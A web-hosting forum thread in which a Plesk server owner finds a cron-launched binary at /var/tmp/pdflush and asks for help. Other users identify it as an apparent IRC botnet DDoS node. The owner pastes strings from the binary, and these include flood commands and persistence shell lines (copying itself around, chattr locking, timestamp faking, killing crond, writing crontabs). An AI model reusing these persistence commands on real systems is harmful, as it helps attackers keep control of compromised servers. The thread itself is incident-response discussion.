Plz help...think i'm hacked.

[mike2010]

running plesk 10.4.4....with a Linux / Unix quadcore with CentOs.


So we physically replaced practically everything on the server, thinking the memory segfault had to be hardware related..but it wasn't.

It's something software related.

The server's running fine , but this is showing up in logs every minute :

/var/log/cron

Jan 18 23:20:01 crond[2012]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:21:01 crond[2101]: (psaadm) CMD (chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:21:01 crond[2103]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:21:01 crond[2107]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:21:01 crond[2108]: (psaadm) CMD (chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:22:01 crond[2179]: (psaadm) CMD (chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:22:01 crond[2181]: (psaadm) CMD (chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:22:01 crond[2185]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1)
Jan 18 23:22:01 crond[2186]: (psaadm) CMD (/var/tmp/pdflush >/dev/null 2>&1)

this pdflush file changed on 12/23/13. The SAME day the memory leaks/faults started.
Originally, this pdflush I thought is suppose to be a part of Plesk...to clean the dirty cache?

But when I try to view it, it shows those encrypted looking characters. (unreadable text)

current size of file :

pdflush : 562,008
file permissions : 755
owner : psaadm (plesk)
location : /var/tmp/pdflush

and what's showing up in /var/log/messages is the memory segfault from the file...this also repeats every minute, and at the same second during every minute. :01

/var/log/messages

Jan 18 23:27:01 kernel: pdflush[2679]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007ffffa91d828 error 6
Jan 18 23:27:01 kernel: pdflush[2683]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fff9781cbb8 error 6
Jan 18 23:27:01 kernel: pdflush[2684]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fffa8b53e08 error 6
Jan 18 23:27:01 kernel: pdflush[2689]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fff2042e6b8 error 6
Jan 18 23:28:01 kernel: pdflush[2765]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fff9e4df9a8 error 6
Jan 18 23:28:01 kernel: pdflush[2764]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fffc05f8968 error 6
Jan 18 23:28:01 kernel: pdflush[2769]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fff83a95c68 error 6
Jan 18 23:28:01 kernel: pdflush[2771]: segfault at 0000000000000000 rip 0000000000419e60 rsp 00007fff9aa40f68 error 6

In my crontab, it's running the following 2 crons every minute :

chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1

/var/tmp/pdflush >/dev/null 2>&1

any ideas ? If you think the pdflush file was hacked, what to do ? is there anyway I could read those encrypted looking characters ?

If this is a virus / hackjob....I wanna know exactly what it's doing. Kind of suspicious that the file changed on 12/23...the exact same day the segfaults started...right ?

If I try to uncheck in plesk (disable) either of the 2 crons above....another instance of the cron automatically pops up.

I appreciate any help...I'm willing to take the time to resolve this smoothly.

 

[mike2010]

mini-update.

I removed the 2 crons from crontab user 'psaadm'

chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1

/var/tmp/pdflush >/dev/null 2>&1

and the segfaults have stopped.

but isn't this a part of plesk needed to flush buffers?

Before I re-enable...I need to know if that file was the original good file...or some hacked version.

 

[mike2010]

could I get some direction here....Kaspersky won't run either, it keeps crashin.

Is this pdflush mandatory to be running? if so, WHERE should it be running at....to make sure it's running ?

I'd like to install something to check for viruses as well....what to install / run....since Kaspersky won't run.

would REALLY appreciate some direction.

seriously considering switching to cPanel next....since support here is basically dead.

 

[IgorG]

You should use rkhunter or chkrootkit for checking your server instead Kaspersky because Kaspersky checks only incoming or outgoing emails.
Also read carefully Plesk security best practices http://kb.parallels.com/114620 for preventing such cases in the future. Upgrade to latest Plesk version is also good point in scope of preventing hacker attacks.

 

[mike2010]

Igor, I appreciate you responding...but please respond to more when attempting to respond.

I haven't even had it confirmed yet if this is EVEN a virus.

And what to do now, since I stopped that process. (cron) Is the 'correct' version of pdflush running elsewhere somewhere ?

I successfully installed the latest version of ClamAv...since Kaspersky wouldn't run. Could I get some basics on what command to use with ClamAv, to scan the server?

I have EVERYTHING restricted by IP... SSH , FTP , PING , and now Plesk is restricted to my IP as well. Previous to this occurance, plesk was not restricted to my IP. So maybe they slipped something in there then.

/var/tmp/pdflush = is that file suppose to be there or no ? If not, where is the correct version suppose to be ?

The server is running fine and no sites are affected...but I need some guidance here on figuring out how this file got thrown there..if I've got everything restricted per IP.

Due to database files probably changing when upgrading from 10.4.4 to your latest version....I do not want to attempt to upgrade Plesk at this time. So i'm doing all the safety precautions I could do , besides that.

please answer some of the questions above..thank u. ( 1 by 1 if possible....it would help alot)

 

[atomicturtle]

This file /var/tmp/pdflush is malicious. Not only does plesk not use that (or anything else on the system), there are no cron jobs that run under the psaadm user. Further given the userid involved, it would be indicative of a fairly serious compromise of the system. Its fair to assume that the attacker has compromised the system either completely, or at least nearly completely since the psaadm user is a fairly trusted entity on the system.

Clam and rkhunter probably wont be much use in this scenario, but it wouldnt hurt to try them. Just bare in mind like kaspersky, clam does not natively have many linux-centric malware signatures unless you're getting them from a 3rd party.

I'd be happy to take apart the malware for you to see what it does.

 

[mike2010]

I'd be happy to take apart the malware for you to see what it does.

how do you want the file ?

screw it , i'll copy and paste the text versions of the file below.

another thing... Is the process psa-pc-remote suppose to suppose to show up in 'top' as well..or no ? It flickers through like once every 5 minutes. with a memory of like 0.3 and cpu 0.4

I'm seeing another 'pdflush' run in 'Top'...but with root as user. I'm guessing that's the good one ?

the good news, if any is....the load average has been 0.01 to 0.08 since removal of the cron that was executing that file. hopefully that's all there is. If there was more, i'd expect a lot more cpu and memory usage.

portion of the corrupt pdflush file below :

invalid ELF header ELF file OS ABI invalid ELF file ABI version invalid internal error file too short   trying file=%s
  search path= 		(%s from file %s)
 :%s 		(%s)
 RPATH RUNPATH   cannot create cache for search path     cannot create RUNPATH/RPATH copy        cannot create search path array cannot create shared object descriptor  failed to map segment from shared object        object file has no loadable segments    object file has no dynamic section      cannot allocate memory for program header       file=%s [%lu];  generating link map
    ELF load command address/offset not properly aligned    ELF load command alignment not page-aligned       dynamic: 0x%0*lx  base: 0x%0*lx   size: 0x%0*Zx
    entry: 0x%0*lx  phdr: 0x%0*lx  phnum:   %*u

     cannot enable executable stack as shared object requires        shared object cannot be dlopen()ed      cannot change memory protections        cannot dynamically load executable      cannot allocate TLS data structures for initial thread  ELF file version does not match current one     ELF file's phentsize not the expected size      ELF file data encoding not little-endian        ELF file version ident does not match current one       only ET_DYN and ET_EXEC can be loaded   
file=%s [%lu];  needed by %s [%lu]
    find library=%s [%lu]; searching
       cannot open shared object file /etc/ld.so.cache glibc-ld.so.cache1.1 ld.so-1.7.0  search cache=%s
      undefined symbol:       symbol=%s;  lookup in file=%s
  binding file %s to %s: %s symbol `%s'   
file=%s [%lu];  needed by %s [%lu] (relocation dependency)

 symbol  , version   (no version symbols)  not defined in file   with link time reference <main program> relocation error symbol lookup error protected normal  [%s]
      cannot allocate memory in static TLS block      %s: Symbol `%s' causes overflow in R_X86_64_32 relocation
      %s: Symbol `%s' causes overflow in R_X86_64_PC32 relocation
    %s: profiler out of memory shadowing PLTREL of %s
      %s: Symbol `%s' has different size in shared object, consider re-linking
       cannot make segment writable for relocation     cannot restore segment prot after reloc %s: profiler found no PLTREL in object %s
              cannot apply additional memory protection after relocation      unexpected reloc type 0x              unexpected PLT reloc type 0x              :fD     ÔhD     jhD     :fD     :fD     .hD     hD     hD     :fD     :fD     iD     :fD     :fD     :fD     :fD     :fD     èhD     ciD     ågD     :fD     ÒgD     ngD     :fD     :fD     +gD     gD     gD     :fD     :fD     ´fD     :fD     :fD     :fD     :fD     :fD     œfD     ƒfD     KfD     <program name unknown>  (lazy) 
relocation processing: %s%s
    cannot load auxiliary `%s' because of empty dynamic string token substitution
  cannot allocate symbol search list      cannot allocate dependency list empty dynamics string token substitution        load filtered object=%s requested by file=%s
   Filters not supported with LD_TRACE_PRELINKING  load auxiliary object=%s requested by file=%s
 out of memory DYNAMIC LINKER BUG!!! :  %s: %s: %s%s%s%s%s
 continued fatal %s: error: %s: %s (%s)
       error while loading shared libraries 
calling init: %s

calling preinit: %s

 unsupported version   of Verdef record weak version ` ' not found (required by   of Verneed record
     no version information available (required by   checking for version `%s' in file %s required by file %s
       cannot allocate version reference table %s: cannot open file: %s
 %s: cannot stat file: %s
 %s: cannot map file: %s
 %s: cannot create file: %s
        %s: file is no correct profile data file for `%s'
      Out of memory while initializing profiler
 /proc/self/exe GLIBC_PRIVATE _dl_open_hook IGNORE gconv_trans_context gconv_trans gconv_trans_init gconv_trans_end .so ^[yY] ^[nN]                                     Ã’QG                                             ÿÿÿÿ           h¢G     ç—G     ç—G     ç—G     ½QG                             Ã’QG                                             ÿÿÿÿ           æ—G     ½QG     ISO/IEC 14652 i18n FDCC-set Keld Simonsen [email protected] +45 3122-6543 +45 3325-6543 ISO 1.0 1997-12-20  ISO/IEC JTC1/SC22/WG20 - internationalization   C/o Keld Simonsen, Skt. Jorgens Alle 8, DK-1615 Kobenhavn V                             i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999  i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999 i18n:1999            
          ÿ             
                        	   
 z   Success Operation not permitted No such file or directory No such process Interrupted system call Input/output error No such device or address Argument list too long Exec format error Bad file descriptor No child processes Cannot allocate memory Permission denied Bad address Block device required Device or resource busy File exists Invalid cross-device link No such device Not a directory Is a directory Invalid argument Too many open files in system Too many open files Text file busy File too large No space left on device Illegal seek Read-only file system Too many links Broken pipe Numerical result out of range Resource deadlock avoided File name too long No locks available Function not implemented Directory not empty No message of desired type Identifier removed Channel number out of range Level 2 not synchronized Level 3 halted Level 3 reset Link number out of range Protocol driver not attached No CSI structure available Level 2 halted Invalid exchange Invalid request descriptor Exchange full No anode Invalid request code Invalid slot Bad font file format Device not a stream No data available Timer expired Out of streams resources Machine is not on the network Package not installed Object is remote Link has been severed Advertise error Srmount error Communication error on send Protocol error Multihop attempted RFS specific error Bad message Name not unique on network File descriptor in bad state Remote address changed Streams pipe error Too many users Destination address required Message too long Protocol not available Protocol not supported Socket type not supported Operation not supported Protocol family not supported Address already in use Network is down Network is unreachable Connection reset by peer No buffer space available Connection timed out Connection refused Host is down No route to host Operation already in progress Operation now in progress Stale NFS file handle Structure needs cleaning Not a XENIX named type file No XENIX semaphores available Is a named type file Remote I/O error Disk quota exceeded No medium found Wrong medium type Operation canceled        Resource temporarily unavailable        Inappropriate ioctl for device  Numerical argument out of domain        Too many levels of symbolic links       Value too large for defined data type   Can not access a needed shared library  Accessing a corrupted shared library    .lib section in a.out corrupted Attempting to link in too many shared libraries Cannot exec a shared library directly   Invalid or incomplete multibyte or wide character       Interrupted system call should be restarted     Socket operation on non-socket  Protocol wrong type for socket  Address family not supported by protocol        Cannot assign requested address Network dropped connection on reset     Software caused connection abort        Transport endpoint is already connected Transport endpoint is not connected     Cannot send after transport endpoint shutdown   Too many references: cannot splice

 

[mike2010]

since there's a character limit in posts...some more of it below :

 NOTICE %s :Saved as %s
 NOTICE %s :Spoofs: %d.%d.%d.%d
 NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d
 NOTICE %s :omfg. stfu. kthx.
 NOTICE %s :NICK <nick>
     NOTICE %s :Nick cannot be larger than 9 characters.
 NICK %s
 NOTICE %s :DISABLE <pass>
 Disabled Enabled and awaiting orders   NOTICE %s :Current status is: %s.
 NOTICE %s :Already disabled.
        NOTICE %s :Password too long! > 254
    NOTICE %s :Disable sucessful.
 NOTICE %s :ENABLE <pass>
 NOTICE %s :Already enabled.
 NOTICE %s :Wrong password
 NOTICE %s :Password correct.
  NOTICE %s :Removed all spoofs
  NOTICE %s :What kind of subnet address is that? Do something like: 169.40
 .0   NOTICE %s :Unable to resolve %s
        NOTICE %s :UDP <target> <port> <secs>
 NOTICE %s :Packeting %s.
        NOTICE %s :PAN <target> <port> <secs>
 NOTICE %s :Panning %s.
  NOTICE %s :TSUNAMI <target> <secs>
     NOTICE %s :Tsunami heading for %s.
     NOTICE %s :UNKNOWN <target> <secs>
 NOTICE %s :Unknowning %s.
 NOTICE %s :Udp pps %s.
 NOTICE %s :UDO53 %s.
 NOTICE %s :UDP53:56 %s.
 NOTICE %s :MOVE <server>
 NOTICE %s :Killing pid %d.
 TSUNAMI PAN UDP UNKNOWN UNKNOWN2 UNKNOWN3 UNKNOWN4 NICK SERVER GETSPOOFS SPOOFS DISABLE ENABLE KILL GET VERSION KILLALL HELP IRC  %s
 CJ    export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s NOTICE %s :%s
   MODE %s +i-x
 JOIN %s :%s
 PONG %s
        NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
 352 376 433 422 PRIVMSG PING       rm -rf /var/tmp/xx.c* >/dev/null 2>&1;rm -rf /var/tmp/jj*.c* >/dev/null 2>&1;cp -f /var/tmp/pdflush $HOME/ >/dev/null 2>&1;chmod +x $HOME/pdflush >/dev/null 2>&1;cp -f /var/tmp/pdflush /usr/local/psa/admin/ >/dev/null 2>&1;chmod +x /usr/local/psa/admin/pdflush >/dev/null 2>&1;cp -f /var/tmp/pdflush var/www/pdflush >/dev/null 2>&1;chmod +x /var/www/pdflush >/dev/null 2>&1   touch -amcr /bin/bash /var/tmp/pdflush >/dev/null 2>&1;chattr +ia /var/tmp/pdflush >/dev/null 2>&1;chattr +isa /var/tmp/pdflush >/dev/null 2>&1;killall -9 perl;killall -9 pid;killall -9 crond /var/tmp/cron touch /var/tmp/cron * * * * *  / %s%s  >/dev/null 2>&1
   @weekly cd /var/tmp;chmod +x pdflush;./pdflush >/dev/null 2>&1;chmod +x %s;%s
  * * * * * chmod +x /var/tmp/pdflush;/var/tmp/pdflush >/dev/null 2>&1
 a crontab /var/tmp/cron;rm -rf /var/tmp/cron /var/tmp/.fontUnix [pdflush] #r0x m00c0w authenticationpassword      PASS %s
NICK EWG|%s
USER %s localhost localhost :%s
 
 * ERROR /proc/sys/kernel/osrelease FATAL: kernel too old
        FATAL: cannot determine kernel version
 /dev/null       cannot set %fs base address for thread-local storage                   
      
                ?                           
  

                               ÿÿÿÿÿÿÿUUUUUUUUÿÿÿÿÿÿÿ?33333333ªªªªªªª*’$I’$I’$ÿÿÿÿÿÿÿqÇqÇq™™™™™™™ÑE]tÑEUUUUUUU±;±;±I’$I’$Iÿÿÿÿÿÿÿ8Žã8Žã85â€Ã—P^Cy
ÌÌÌÌÌÌÌ0Ã0Ã0袋.ºè¢²Â…,d!ªªªªªªª
p=
×£p=
؉Â؉ÂØ	%´—Ã^B{	$I’$I’$	Ë=°ÜÓˆˆˆˆˆˆˆB!„BÿÿÿÿÿÿÿðÃ|ðLJ‡‡‡‡‡PuPuPÇqÇq-c /bin/sh exit 0                                       pÅ’@     Å¡@     *â€@     ¸@     àÆ@     `¨@      ¹@     p¡@     º@     pÅ @      Ÿ@     *$C     p¦@     ۤ@     °¦@     €k@     À¦@     °È@     ÀÈ@                                             pÅ’@     0t@      t@     00C     `:C     *Â@      «@     Â|@     º@     °Š@     z@     Â&C     p¦@     ۤ@     °¦@     @§@     À¦@     °È@     ÀÈ@                                             pÅ’@     0t@     Àr@     00C     `:C     *Â@      «@     Â|@     º@     °Š@     z@     Â&C     p¦@     ۤ@     °¦@     à¦@     À¦@     °È@     ÀÈ@                                             pÅ’@     0t@      o@     00C     `:C     *Â@      «@     Â|@     º@     pÅ @     z@     Â&C     p¦@     ۤ@     °¦@     @§@     À¦@     °È@     ÀÈ@     LIBC_FATAL_STDERR_ /dev/tty                                             pÅ’@     Å¡@     ð™@     ¸@     àÆ@     `¨@     À*@     @¦@     º@     °Š@      Ÿ@     *$C     p¦@     ۤ@     °¦@     @§@     À¦@     °È@     ÀÈ@                                             pÅ’@     Å¡@      Ëœ@     ¸@     àÆ@     `¨@     *¬@     PÂ¥@     º@     °Š@     ð*@     *$C     p¦@     ۤ@     °¦@     à¦@     À¦@     °È@     ÀÈ@                                             pÅ’@     Å¡@     *â€@     ¸@     àÆ@     `¨@      «@     p¡@     º@     pÅ @      Ÿ@     *$C     p¦@     ۤ@     °¦@     @§@     À¦@     °È@     ÀÈ@     ,ccs=                                   ðÎ@     °Ë@     PÃ@     ¸@     ÃÃŽ@     @¸@      ¹@     ÀÃ@     º@     ¹@     °¾@     °º@     ÂÈ@     *È@     pÈ@     °¾@     €È@     °È@     ÀÈ@     *** glibc detected *** %s: 0x%s ***
    double free or corruption (top) double free or corruption (!prev)       double free or corruption (fasttop)     free(): invalid next size (normal)      free(): invalid next size (fast)        double free or corruption (out) malloc(): memory corruption (fast) corrupted double-linked list malloc: top chunk is corrupt free(): invalid pointer malloc(): memory corruption realloc(): invalid size realloc(): invalid pointer realloc(): invalid next size malloc: using debugging hooks TOP_PAD_ TRIM_THRESHOLD_ MMAP_THRESHOLD_ MMAP_MAX_ Arena %d:
 system bytes     = %10u
 in use bytes     = %10u
 Total (incl. mmap):
 max mmap regions = %10u
 max mmap bytes   = %10lu
  ¯A     ·A     ¿A     ÃŒA     ÛA     SA     A     TDA     bDA     nDA     DA     ÂDA     ¡DA     µDA     DA     vFA     ‰FA     Å¡FA     ¬FA     ¾FA     ÓFA     èFA     %FA     *|X     
        |X     
       ANSI_X3.4-1968//TRANSLIT <%d> %h %e %T  [%d] /dev/console %s
  syslog: unknown facility/priority: %x           ÿÿÿÿÿÿÿ ÿÿ  ÿ   gethostbyname_r hosts cannot extend global scope dlopen cannot create scope list invalid mode for dlopen()      opening file=%s [%lu]; direct_opencount=%u

    TLS generation counter wrapped!  Please report this.    empty dynamic string token substitution DST not allowed in SUID/SGID programs     cannot create TLS data structures     invalid target namespace in dlmopen()   no more namespaces available for dlmopen() shared object not open 
calling fini: %s [%lu]

     
closing file=%s; direct_opencount == %u
       TLS generation counter wrapped!  Please report as described in <http://www.gnu.org/software/libc/bugs.html>.

 

[atomicturtle]

You can send it to [email protected] (zip it with a password "pass" or something), or you can email us with a URL to download it at if you prefer.

From what little you pasted from the strings in the binary it looks like its a DDoS node for a botnet, but I'd need the actual binary to know for sure.

Given the level of privilege its installed with, this is a fairly serious compromise.

 

[mike2010]

well it occurred on plesk 10.4.4. Everything else on the server was secure, so it could of only happened from plesk. also considering the cron user was 'psaadm'

my Plesk Admin Interface is now IP restricted....to my IP. (previously it was not)

any idea how he was able to get a file to /var/tmp/ ? default Permissions there are 1777. pretty high for default permissions.

I notice no other dysfunctions.

I've got the latest version of ClamAV installed...but still waiting on the right command to use...to scan the server.

 

[atomicturtle]

well it occurred on plesk 10.4.4. Everything else on the server was secure, so it could of only happened from plesk. also considering the cron user was 'psaadm'

Tough to say without more information. There are countless attack vectors here, from desktop malware targeting sysadmin credentials, to local vulnerabilities on the platform.

any idea how he was able to get a file to /var/tmp/ ? default Permissions there are 1777. pretty high for default permissions.

Any process can write there, that and /tmp are the easiest/most obvious places to go.

I've got the latest version of ClamAV installed...but still waiting on the right command to use...to scan the server.

clamscan -R /, but I wouldnt put too much faith in this. The default sigs are primarily centered on win32 malware. Doesn't hurt to run it though.

 

[mike2010]

I appreciate the help with this atomic. Usually never have to worry about virus issues. Might even try your product out soon,is it Yum Install'able yet ?

I installed ClamAv via Yum Install.

My first attempt at running. any ideas ?

[root@mysite ~]# clamscan -R /

clamscan: illegal option -- R
ERROR: Unknown option passed
ERROR: Can't parse command line options


[root@mysite ~]# clamscan -r /home

LibClamAV Error: cli_loaddb(): No supported database files found in /var/clamav
ERROR: Can't open file or directory

----------- SCAN SUMMARY -----------
Known viruses: 0
Engine version: 0.98
Scanned directories: 0
Scanned files: 0
Infected files: 0
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.032 sec (0 m 0 s)
[root@mysite ~]#

/var/clamav directory was completely empty when checking just now.

EDIT : arghh.. I see a million options to edit in /etc/freshclam.conf . So i'm guessing this isn't something that works out of the box.